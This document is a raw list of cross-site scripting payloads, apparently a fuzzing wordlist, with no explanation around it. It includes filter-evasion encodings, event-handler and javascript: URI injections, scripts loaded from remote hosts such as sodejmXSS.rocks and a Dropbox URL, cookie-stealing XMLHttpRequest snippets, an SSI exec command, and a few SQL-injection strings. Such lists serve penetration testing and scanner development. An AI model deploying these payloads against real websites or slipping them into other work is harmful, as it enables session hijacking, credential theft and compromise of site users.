//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ | |
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> | |
<a/href="javascript: javascript:prompt(1)"><input type="X"> | |
</plaintext\></|\><plaintext/onmouseover=prompt(1) | |
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} | |
<a href="javascript:\u0061le%72t(1)"><button> | |
<div onmouseover='alert(1)'>DIV</div> | |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
<a href="jAvAsCrIpT:alert(1)">X</a> | |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<var onmouseover="prompt(1)">On Mouse Over</var> | |
<a href=javascript:alert(document.cookie)>Click Here</a> | |
<img src="/" =_=" title="onerror='prompt(1)'"> | |
<%<!--'%><script>alert(1);</script --> | |
<script src="data:text/javascript,alert(1)"></script> | |
<iframe/src \/\/onload = prompt(1) | |
<iframe/onreadystatechange=alert(1) | |
<svg/onload=alert(1) | |
<input value=<><iframe/src=javascript:confirm(1) | |
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> | |
http://www.<script>alert(1)</script .com | |
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> | |
<svg><script ?>alert(1) | |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
<img src=`xx:xx`onerror=alert(1)> | |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<svg contentScriptType=text/vbs><script>MsgBox | |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U | |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/sodejmXSS/)></script | |
<object data=javascript:\u0061le%72t(1)> | |
<script>++1-+?(1)</script> | |
<body/onload=<!-->
alert(1)> | |
<script itworksinallbrowsers>/*<script* */alert(1)</script | |
<img src ?itworksonchrome?\/onerror = alert(1) | |
<svg><script>//
confirm(1);</script </svg> | |
<svg><script onlypossibleinopera:-)> alert(1) | |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
<script x> alert</script 1=2 | |
<div/onmouseover='alert(1)'> style="x:"> | |
<--`<img/src=` onerror=alert(1)> --!> | |
<script/src=data:text/javascript,alert(1)></script> | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> | |
"><img src=x onerror=window.open('https://www.zsec.uk');> | |
<form><button formaction=javascript:alert(1)>CLICKME | |
<math><a xlink:href="//0r.pe">click | |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik></object> | |
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
1<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E | |
<<scr\0ipt/src=http://sodejmXSS.com/sodejmXSS.js></script | |
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E | |
' onmouseover=alert(/Black.Spook/) | |
"><iframe%20src="http://google.com"%%203E | |
'<script>window.onload=function(){document.forms[0].message.value='1';}</script> | |
x”</title><img src%3dx onerror%3dalert(1)> | |
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> | |
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> | |
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://sodejmXSSme.html5sec.org/sodejmXSSme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cook= '(.*?)'/)[1]) };xhr.send();</script> | |
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> | |
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cook= '(.*?)'/)[1])</script> | |
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/sodejmXSSme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> | |
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> | |
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> | |
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> | |
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/sodejmXSSme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cook= '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> | |
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cook}}); alert(Safe.get());</script> | |
<script>alert(document.head.innerHTML.substr(146,20));</script> | |
<script>alert(document.head.childNodes[3].text)</script> | |
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/sodejmXSSme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> | |
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> | |
<script>x=document.createElement(%22iframe%22);x.src=%22http://sodejmXSSme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://sodejmXSSme.html5sec.org/sodejmXSSme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> | |
<script>x=document.createElement(%22iframe%22);x.src=%22http://sodejmXSSme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> | |
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/sodejmXSSme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> | |
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> | |
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> | |
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookis ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> | |
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522sodejmXSSme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> | |
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> | |
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # | |
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # | |
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># | |
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/sodejmXSSme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># | |
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 | |
<script for=document event=onreadystatechange>getElementById('safe123').click()</script> | |
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> | |
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> | |
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://sodejmXSSme.html5sec.org/sodejmXSSme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://sodejmXSSme.html5sec.org/sodejmXSSme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://sodejmXSSme.html5sec.org/sodejmXSSme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://sodejmXSSme.html5sec.org/sodejmXSSme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># | |
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://sodejmXSSme.html5sec.org/sodejmXSSme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cook= '(.*?)'/)[1]) };xhr.send(); | |
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cook= '(.*?)'/)[1])</script> | |
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252FsodejmXSSme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> | |
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://sodejmXSSme.html5sec.org/sodejmXSSme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cook= '(.*?)'/)[1]) };xhr.send(); | |
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> | |
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> | |
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://sodejmXSSme.html5sec.org/sodejmXSSme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cook= '(.*?)'/)[1]) };xhr.send(); | |
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/sodejmXSSme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E | |
<iframe src=`http://sodejmXSSme.html5sec.org/?sodejmXSS=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/sodejmXSSme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> | |
<a target="x" href="sodejmXSSme?sodejmXSS=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E | |
<a target="x" href="sodejmXSSme?sodejmXSS=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> | |
<a target="x" href="sodejmXSSme?sodejmXSS=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cook= '(.*?)'/)[1])</script> | |
<a target="x" href="sodejmXSSme?sodejmXSS=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cook= '(.*?)'/)[1]) };xhr.send(); | |
Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> | |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? | |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? | |
<var onmouseover="prompt(1)">On Mouse Over</var>? | |
<input type="text" value=``<div/onmouseover='alert(1)'>X</div> | |
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ? | |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>? | |
<embed code="http://businessinfo.co.uk/labs/sodejmXSS/sodejmXSS.swf" allowscriptaccess=always>? | |
<svg contentScriptType=text/vbs><script>MsgBox+1 | |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/sodejmXSS/)></script ???????????? | |
<script>+-+-1-+-+alert(1)</script> | |
<script itworksinallbrowsers>/*<script* */alert(1)</script ? | |
<img src ?itworksonchrome?\/onerror = alert(1)??? | |
<script x> alert(1) </script 1=2 | |
<--`<img/src=` onerror=alert(1)> --!> | |
<script/src=data:text/javascript,alert(1)></script> ? | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? | |
"><img src=x onerror=window.open('https://www.google.com/');> | |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? | |
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
"><img src=x onerror=prompt(1);> | |
<SCRIPT SRC=http://sodejmXSS.rocks/sodejmXSS.js></SCRIPT> | |
SRC=
<IMG 6;avascript:alert('XSS')> | |
<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a> | |
<IMG SRC=java%00script:alert(\"sodejmXSS\")> | |
<SCR%00IPT>alert(\"sodejmXSS\")</SCR%00IPT> | |
<SCRIPT/sodejmXSS SRC="http://sodejmXSS.rocks/sodejmXSS.js"></SCRIPT> | |
<SCRIPT SRC=http://sodejmXSS.rocks/sodejmXSS.js?<B> | |
\";alert('sodejmXSS');// | |
<LAYER SRC="http://sodejmXSS.rocks/scriptlet.html"></LAYER> | |
<LINK REL="stylesheet" HREF="http://sodejmXSS.rocks/sodejmXSS.css"> | |
<STYLE>@import'http://sodejmXSS.rocks/sodejmXSS.css';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<http://sodejmXSS.rocks/sodejmXSS.css>; REL=stylesheet"> | |
<STYLE>BODY{-moz-binding:url("http://sodejmXSS.rocks/sodejmXSSmoz.xml#sodejmXSS")}</STYLE> | |
<META HTTP-EQUIV="Link" Content="<javascript:alert('sodejmXSS')>; REL=stylesheet"> | |
exp/*<sodejmXSS STYLE='no\sodejmXSS:nosodejmXSS("*//*"); | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://sodejmXSS.rocks/scriptlet.html"></OBJECT> | |
getURL("javascript:alert('sodejmXSS')") | |
a="get"; | |
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('sodejmXSS');"> | |
<XML SRC="http:/sodejmXSS.rocks/sodejmXSStest.xml" ID=I></XML> | |
<SCRIPT SRC="http://sodejmXSS.rocks/sodejmXSS.jpg"></SCRIPT> | |
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://sodejmXSS.rocks/sodejmXSS.js></SCRIPT>'"--> | |
<? echo('<SCR)'; | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('sodejmXSS');+ADw-/SCRIPT+AD4- | |
<SCRIPT a=">" SRC="http://sodejmXSS.rocks/sodejmXSS.js"></SCRIPT> | |
<SCRIPT a=">" '' SRC="http://sodejmXSS.rocks/sodejmXSS.js"></SCRIPT> | |
<SCRIPT "a='>'" SRC="http://sodejmXSS.rocks/sodejmXSS.js"></SCRIPT> | |
<SCRIPT a=`>` SRC="http://sodejmXSS.rocks/sodejmXSS.js"></SCRIPT> | |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="sodejmXSS.rocks/sodejmXSS.js"></SCRIPT> | |
<font style='color:expression(alert('sodejmXSS'))'> | |
' or 2=2 | |
" or 202 | |
";eval(unescape(location))//# %0Aalert(0) | |
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("sodejmXSS")> | |
alert(1) | |
&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> | |
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi | |
&#39;&#88;&#83;&#83;&#39;&#41;> | |
<IMG """><SCRIPT>alert("sodejmXSS")</SCRIPT>"> | |
<img src=x:x onerror=alert(1)> | |
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40; | |
<SCRIPT SRC=//sodejmXSS.rocks/.j> | |
'); alert('sodejmXSS | |
<~/sodejmXSS/*-*/STYLE=sodejmXSS:e/**/xpression(alert('sodejmXSS'))> | |
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
<a onmouseover="alert(document.cookie)">xxs link</a> | |
<a onmouseover=alert(document.cookie)>xxs link</a> | |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("sodejmXSS")> | |
<body onLoad="alert('sodejmXSS');" | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? | |
<FRAMESET><FRAME SRC=\"javascript:alert('sodejmXSS');\"></FRAMESET> | |
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ? | |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cook}}); alert(Safe.get());</script> | |
<IMG DYNSRC=\"javascript:alert('sodejmXSS')\"> | |
<IMG onmouseover="alert('xxs')"> | |
<IMG SRC= onmouseover="alert('xxs')"> | |
<IMG SRC="jav&#x09;ascript:alert('sodejmXSS');"> | |
<IMG SRC="jav&#x0A;ascript:alert('sodejmXSS');"> | |
<IMG SRC="jav&#x0D;ascript:alert('sodejmXSS');"> | |
<img src=x onerror="javascript:alert('XSS')"> | |
<SCRIPT\s" != "<SCRIPT/sodejmXSS\s';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> | |
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookis ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> | |
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # | |
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/sodejmXSSme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cook= '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> | |
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |
alert(1) | |
alert(1) | |
alert\\`1\\` | |
alert`1` | |
<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> | |
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe | |
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe | |
javascript:alert%28/sodejmXSS/%29 | |
javascript:alert(1) | |
[[#%3Cscript%3Ealert(1)%3C/script%3E| | |
PHNjcmlwdD5hbGVydCgnc29kZWptJyk8L3NjcmlwdD4K | |
PHNjcmlwdD5hbGVydCgnc29kZWptJyk8L3NjcmlwdD4K== | |
PHNjcmlwdD5hbGVydCgnc29kZWptJyk8L3NjcmlwdD4K= | |
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo= | |
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo== | |
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo | |
PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg | |
